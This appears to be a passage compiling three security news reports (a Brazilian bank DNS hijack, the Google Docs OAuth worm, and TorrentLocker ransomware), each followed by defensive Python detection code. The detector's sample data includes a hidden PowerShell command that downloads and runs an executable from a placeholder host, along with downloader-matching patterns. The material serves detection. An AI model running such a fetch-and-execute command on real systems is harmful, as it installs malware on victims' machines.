...login credentials at sites hosted at the bank's legitimate web addresses. Kaspersky researchers believe the hackers may have even simultaneously redirected all transactions at ATMs or point-of-sale systems to their own servers, collecting the credit card details of anyone who used their card that Saturday afternoon. "Absolutely all of the bank's online operations were under the attackers' control for five to six hours," says Dmitry Bestuzhev, one of the Kaspersky researchers who analyzed the attack in real time after seeing malware infecting customers from what appeared to be the bank's fully valid domain. From the hackers' point of view, as Bestuzhev puts it, the DNS attack meant that "you become the bank." Kaspersky isn't releasing the name of the bank that was targeted in the DNS redirect attack. But the firm says it's a major Brazilian financial company with hundreds of branches, operations in the US and the Cayman Islands, 5 million customers, and more than $27 billion in assets. And though Kaspersky says it doesn't know the full extent of the damage caused by the takeover, it should serve as a warning to banks everywhere to consider how the insecurity of their DNS might enable a nightmarish loss of control of their core digital assets. "This is a known threat to the internet," Bestuzhev says. "But we've never seen it exploited in the wild on such a big scale." Attacking DNS records can take down sites or, worse, redirect them to a destination of the hacker's choosing. In 2013, for instance, the Syrian Electronic Army hacker group altered the DNS registration of The New York Times to redirect visitors to a page with their logo. More recently, the Mirai botnet attack on the DNS provider Dyn knocked a major chunk of the web offline, including Amazon, Twitter, and Reddit. But the Brazilian bank attackers exploited their victim's DNS in a more focused and profit-driven way.
Kaspersky believes the attackers compromised the bank's account at Registro.br. That's the domain registration service of NIC.br, the registrar for sites ending in the Brazilian .br top-level domain, which Kaspersky says also managed the DNS for the bank. The spoofed sites even had valid HTTPS certificates issued in the name of the bank, so that visitors' browsers would show a green lock and the bank's name, just as they would with the real sites. Kaspersky found that the certificates had been issued six months earlier by Let's Encrypt, the non-profit certificate authority that has made obtaining an HTTPS certificate easier in the hope of increasing HTTPS adoption. "If an entity gained control of DNS, and thus gained effective control over a domain, it may be possible for that entity to get a certificate from us," says Let's Encrypt founder Josh Aas. "Such issuance would not constitute mis-issuance on our part, because the entity receiving the certificate would have been able to properly demonstrate control over the domain." Ultimately, the hijack was so complete that the bank wasn't even able to send email. "They couldn't even communicate with customers to send them an alert," Bestuzhev says. "If your DNS is under the control of cybercriminals, you're basically screwed." Aside from mere phishing, the spoofed sites also infected victims with a malware download that disguised itself as an update to the Trusteer browser security plug-in that the Brazilian bank offered customers. According to Kaspersky's analysis, the malware harvests not just banking logins, from the Brazilian banks as well as eight others, but also email and FTP credentials, as well as contact lists from Outlook and Exchange, all of which went to a command-and-control server hosted in Canada.
The Trojan also included a function meant to disable antivirus software; for infected victims, the compromise may have persisted far beyond the five-hour window when the attack occurred. The malware also included scraps of Portuguese, hinting that the attackers may themselves have been Brazilian. After around five hours, Kaspersky's researchers believe, the bank regained control of its domains, likely by calling up NIC.br and convincing it to correct the DNS registrations. But just how many of the bank's millions of customers were caught up in the DNS attack remains a mystery. Kaspersky says the bank hasn't shared that information with the security firm, nor has it publicly disclosed the attack. But the firm says it's possible that the attackers could have harvested hundreds of thousands or millions of customers' account details, not only from their phishing scheme and malware but also from redirecting ATM and point-of-sale transactions to infrastructure they controlled. Kaspersky's Bestuzhev argues that, for banks, the incident should serve as a clear warning to check on the security of their DNS. He notes that half of the top 20 banks ranked by total assets don't manage their own DNS, instead leaving it in the hands of a potentially hackable third party. And regardless of who controls a bank's DNS, banks can take special precautions to prevent their DNS registrations from being changed without safety checks, such as the "registry lock" some registrars provide and two-factor authentication that makes it far harder for hackers to alter them. Without those simple precautions, the Brazilian heist shows how quickly a domain switch can undermine practically all other security measures a company might implement.
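One concrete form of the DNS check Bestuzhev recommends is a baseline audit that alerts when a domain's registered nameservers or the addresses of its key hosts drift, which is exactly what happened to the Brazilian bank. This is an added example, not code from the article or from Kaspersky; it assumes you feed it record sets already gathered by your resolver, and the domain, nameservers and IP addresses in the sample are constructed placeholders.

```python
"""Detect registrar- or zone-level DNS hijacking by comparing live records
against a signed-off baseline. Added example, not from the article or Kaspersky.
It takes record sets you already gathered with your resolver (dig, dnspython, ...);
the sample below is constructed, and bank.example / all IPs are placeholders."""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network

@dataclass
class Baseline:
    domain: str
    nameservers: set          # NS set registered at the registrar for the zone
    hosts: dict               # hostname -> set of expected A records
    netblocks: list = field(default_factory=list)  # CIDRs the organisation owns

def audit(baseline: Baseline, observed_ns, observed_hosts: dict) -> list:
    """Return (severity, message) findings; an empty list means no drift."""
    findings = []
    # A changed NS set is the registrar-level pattern from the Brazilian case:
    # the registrant account is altered and every hostname follows it.
    if set(observed_ns) != baseline.nameservers:
        findings.append(("critical", f"NS set for {baseline.domain} changed: "
            f"expected {sorted(baseline.nameservers)}, saw {sorted(observed_ns)}"))
    nets = [ip_network(n) for n in baseline.netblocks]
    for host, expected in baseline.hosts.items():
        seen = set(observed_hosts.get(host, ()))
        if not seen:
            findings.append(("high", f"{host} no longer resolves"))
            continue
        for addr in seen - expected:
            inside = any(ip_address(addr) in n for n in nets)
            # Drift inside owned space is a likely mis-change; outside it is a hijack.
            findings.append(("high" if inside else "critical",
                f"{host} resolves to unexpected {addr}"
                + ("" if inside else " outside owned netblocks")))
    return findings
# Constructed sample: the zone is repointed at attacker nameservers and the
# online-banking hosts now resolve outside the bank's address space.
BASELINE = Baseline(
    domain="bank.example",
    nameservers={"ns1.registrar.example.", "ns2.registrar.example."},
    hosts={"www.bank.example": {"203.0.113.10"}, "ib.bank.example": {"203.0.113.20"}},
    netblocks=["203.0.113.0/24"],
)
HIJACKED_NS = {"ns1.attacker.example.", "ns2.attacker.example."}
HIJACKED_HOSTS = {"www.bank.example": ["198.51.100.7"], "ib.bank.example": ["198.51.100.7"]}

if __name__ == "__main__":
    for sev, msg in audit(BASELINE, HIJACKED_NS, HIJACKED_HOSTS):
        print(sev.upper(), msg)
```

Run it on a schedule from a vantage point outside the registrar and pair it with the registry lock and two-factor authentication the article mentions; the audit detects a change, it does not prevent one.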
A widely reported e-mail purporting to be a request to share a Google Docs document is actually a well-disguised phishing attack. It directs the user to a lookalike site and grants the site access to the target's Google credentials. If the victim clicks on the prompt to give the site permission to use Google credentials, the phish then harvests all the contacts in the victim's Gmail address book and adds them to its list of targets. The phish appears to have been initially targeted at a number of reporters, but it quickly spread widely across the Internet. Some of the sites associated with the attack appear to have been shut down. The e-mail uses a technique that a Trend Micro report linked last week to Pawn Storm, an ongoing espionage campaign frequently attributed to Russian intelligence operations. The attack uses the OAuth authentication interface, which is also used by many Web services to allow users to log in without using a password. By abusing OAuth, the attack is able to present a legitimate Google dialogue box requesting authorization. However, the authorization request also asks permission for access to "view and manage your e-mail" and "view and manage the files in your Google Drive." The fake application used in the Pawn Storm phish (which posed as a Google security alert) was named "Google Defender." Today's phish asks the target to grant access to "Google Docs", a fake application using the name of Google's service. If the target grants permission, the malicious site will immediately harvest contacts from the target's e-mail and send copies of the original message to them. [Update, 4:40 pm EDT:] Google has struck hard at the worm.
Not only have all the sites associated with the phish been taken offline, but the permissions associated with the worm have been dropped from victims' accounts. The domains used in the attack were registered through NameCheap and used a Panama-based privacy service to conceal the registration information. The hostnames were pointed at a server behind Cloudflare's content delivery and denial-of-service protection network.
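The consent screen is where this worm is visible to a defender: the requested scopes map to the "view and manage your e-mail" and Drive prompts quoted above, and the client name imitates a Google product. The triage routine below is an added example, not code from the article or from Google; it parses the authorization URL the browser is sent to and the app name shown on the consent screen, and the sample URL, client_id and redirect host are constructed placeholders.

```python
"""Triage a third-party OAuth consent request of the kind the Google Docs worm
abused. Added example, not from the article or Google. It takes the authorization
URL the browser is sent to plus the app name shown on the consent screen; the
sample URL, client_id and redirect host below are constructed placeholders."""
from urllib.parse import urlparse, parse_qs

# Real Google scope strings whose consent wording matches the article's
# "view and manage your e-mail" / "... files in your Google Drive" prompts.
HIGH_RISK_SCOPES = {
    "https://mail.google.com/": "full Gmail read/send/delete",
    "https://www.googleapis.com/auth/drive": "full Google Drive access",
    "https://www.googleapis.com/auth/contacts": "read/write contacts (how the worm spread)",
}
GOOGLE_PRODUCT_NAMES = {"google docs", "google drive", "google defender", "gmail"}

def triage_consent(auth_url: str, app_name: str) -> dict:
    """Classify one consent request; risk is 'high' if any reason is found."""
    q = parse_qs(urlparse(auth_url).query)
    scopes = q.get("scope", [""])[0].split()
    reasons = [f"requests {HIGH_RISK_SCOPES[s]} ({s})" for s in scopes if s in HIGH_RISK_SCOPES]
    # A third-party client named after a first-party product is the lure used
    # by both "Google Docs" and the earlier "Google Defender".
    if app_name.strip().lower() in GOOGLE_PRODUCT_NAMES:
        reasons.append(f"app name '{app_name}' impersonates a Google product")
    redirect_host = urlparse(q.get("redirect_uri", [""])[0]).hostname or ""
    return {"risk": "high" if reasons else "low", "reasons": reasons,
            "scopes": scopes, "redirect_host": redirect_host}

# Constructed sample mirroring the worm's request: a client calling itself
# "Google Docs" asking for mail, drive and contacts and redirecting off-Google.
SAMPLE_URL = (
    "https://accounts.google.com/o/oauth2/v2/auth?response_type=code"
    "&client_id=PLACEHOLDER-CLIENT-ID.apps.googleusercontent.com"
    "&redirect_uri=https%3A%2F%2Fdocs-share.example%2Fcallback"
    "&scope=https%3A%2F%2Fmail.google.com%2F%20"
    "https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdrive%20"
    "https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts"
)

if __name__ == "__main__":
    result = triage_consent(SAMPLE_URL, "Google Docs")
    print(result["risk"], "-> tokens would go to", result["redirect_host"])
    for reason in result["reasons"]:
        print(" -", reason)
```

The same rule set applies to a tenant-wide review of already-granted third-party apps, which is the cleanup Google performed when it dropped the worm's permissions from victims' accounts.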
It's been quiet since 2015, but TorrentLocker has suddenly returned. And this time it wants to steal your passwords too. Cybercriminals are always adding new malicious tricks to ransomware. A ransomware variant which has been relatively inactive for almost two years is back, and this time it's stealing user credentials from victims in addition to demanding a ransom to decrypt locked files. TorrentLocker, also known as Cryptolocker, started targeting Windows users in 2014 before dropping off by the summer of 2015. Like the majority of ransomware schemes, TorrentLocker spreads via spam email messages containing malicious attachments. If the victim enables the attachment's macros by choosing 'Enable Editing', PowerShell code is executed and the ransomware is downloaded, encrypting the victim's files until they pay a ransom. But that isn't where the malicious activity ends, because as noted by cybersecurity researchers at Heimdal Security, this incarnation of TorrentLocker has new features, including the ability to spread itself to other computers via shared files, something which could see the ransomware taking over a whole network in a very short space of time. In addition to holding networks to ransom, the new version of TorrentLocker also harvests usernames and passwords from infected computers, putting businesses at risk of cyberespionage and data breaches, while users could see their personal or financial information leaked and sold to cybercriminals on the dark web.
The researchers warn that the revived TorrentLocker campaign is "very aggressive" and that many well-known antivirus products haven't been updated to protect against it, even days after the campaign began. Heimdal Security warns users in its native Denmark that they're being highly targeted by TorrentLocker. Indeed, it appears that European internet users are the main target for those behind the campaign, as Microsoft told BleepingComputer that Italy is by far the most targeted by the perpetrators.
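Because signature updates lagged the campaign by days, the more durable detection is behavioural: an Office application spawning PowerShell that fetches a payload, which is the delivery step the article describes. The scorer below is an added example, not code from the article or from Heimdal Security; the event fields (host, parent_image, image, command_line) and both sample events are constructed, not real telemetry.

```python
"""Flag the delivery chain described above, an Office macro spawning PowerShell
that downloads a payload, from endpoint process-creation events. Added example,
not from the article or Heimdal Security; the event fields and both sample
events are constructed, not real telemetry."""
import json, re
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line traits of a macro-driven downloader stage (matched case-insensitively).
DOWNLOAD_PATTERNS = [r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|bitsadmin",
                     r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden", r"\biex\b|invoke-expression"]
def score_event(ev: dict) -> tuple:
    """Return (score, reasons) for one process-creation event."""
    parent = ev.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("command_line", "")
    score, reasons = 0, []
    if parent in OFFICE_PARENTS and image in SHELLS:
        score += 5                       # Office apps should not be launching shells
        reasons.append(f"{parent} spawned {image}")
    for pat in DOWNLOAD_PATTERNS:
        if re.search(pat, cmd, re.IGNORECASE):
            score += 2
            reasons.append(f"command line matches /{pat}/")
    return score, reasons

def detect(lines, threshold: int = 7) -> list:
    """Return (host, score, reasons) for JSON-lines events scoring >= threshold."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.get("host"), score, reasons))
    return hits

# Constructed events: a benign admin shell, then a Word macro pulling a payload.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Service"},
    {"host": "ws02", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -c \"(New-Object Net.WebClient)"
                     ".DownloadFile('http://invoice.example/x','x.exe'); Start-Process x.exe\""},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]
if __name__ == "__main__":
    for host, score, reasons in detect(SAMPLE_LOG):
        print(host, score, "; ".join(reasons))
```

The threshold is set so that an Office-to-shell parent chain alone does not fire (some add-ins do this), but Office-to-shell plus any one downloader trait does.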